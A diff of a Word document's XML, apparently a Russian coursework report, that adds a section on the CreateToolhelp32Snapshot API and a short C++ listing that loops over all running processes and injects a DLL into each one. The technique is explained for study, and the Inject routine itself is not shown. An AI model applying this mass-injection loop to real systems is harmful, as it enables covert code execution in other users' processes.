-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t>return false;</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8203,18 +8328,26 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8222,19 +8355,797 @@
         <w:ind w:firstLine="708"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve">5.5 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Процедура получения снимка процессов</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HANDLE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WINAPI</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CreateTo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>olhelp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>32</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Snapshot</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dwFlags</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>32</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ProcessID</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) - </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>м</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>оментальный снимок из указанных</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> процессов, а также кучи, модулей и потоков</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, используемые этими процессами.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dwFlags</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
       </w:r>
       <w:bookmarkStart w:id="1" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">части системы, которые будут включены в снимок. Для получения снимка всех процессов — это параметр должен устанавливаться в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>TH32CS_SNAPPROCESS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>32</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ProcessID</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>для</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dwFlags</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TH32CS_SNAPPROCESS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>этот</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>параметр</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>игнорируется</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Если функция завершается успешно, она возвращает открыты</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>й дескриптор к указанному снимку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>5.5.1 Листинг кода инжекции в процессы, полученные в снимке</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (hProcessSnap == INVALID_HANDLE_VALUE)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return FALSE;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>pe32.dwSize = sizeof(PROCESSENTRY32);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>do {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (!Process3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>2Next(hProcessSnap, &amp;pe32))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>return FALSE;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (Inject(pe32.th32ProcessID, dllPath))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; "Injection success:" &lt;&lt; pe32.szExeFile &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>} whil</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>true);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8242,12 +9153,26 @@
         <w:ind w:firstLine="708"/>
         <w:jc w:val="both"/>
         <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:br w:type="page"/>
       </w:r>
       <w:bookmarkStart w:id="2" w:name="_Toc414805630"/>
@@ -8268,16 +9193,17 @@
           <w:b/>
           <w:bCs/>
           <w:sz w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="en-US"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -8287,12 +9213,12 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:b w:val="0"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -8304,7 +9230,23 @@
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Список литературы</w:t>
+        <w:t>Список</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>литературы</w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
     </w:p>
@@ -8314,20 +9256,26 @@
         <w:rPr>
           <w:sz w:val="36"/>
           <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
@@ -10061,7 +11009,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
